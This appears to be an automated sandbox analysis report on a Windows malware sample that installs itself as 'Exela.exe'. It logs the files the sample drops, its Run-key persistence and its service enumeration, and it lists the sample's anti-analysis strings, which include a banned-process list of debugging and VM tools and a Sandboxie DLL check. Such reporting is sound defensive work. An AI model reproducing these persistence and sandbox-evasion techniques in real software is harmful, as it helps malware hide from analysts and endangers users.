Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_parser.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\yarl\_quoting_c.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\python311.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\frozenlist\_frozenlist.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\python3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_uuid.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_websocket.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Exela Update Service
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Exela Update Service
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA751E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF72AA751E0
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXEP5
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEP
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE0F
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE", # XEN
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"P
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEP.
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"P/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE05
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"P
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 919
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_cffi_backend.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\multidict\_multidict.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_writer.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_helpers.cp311-win_amd64.pyd Jump to dropped file
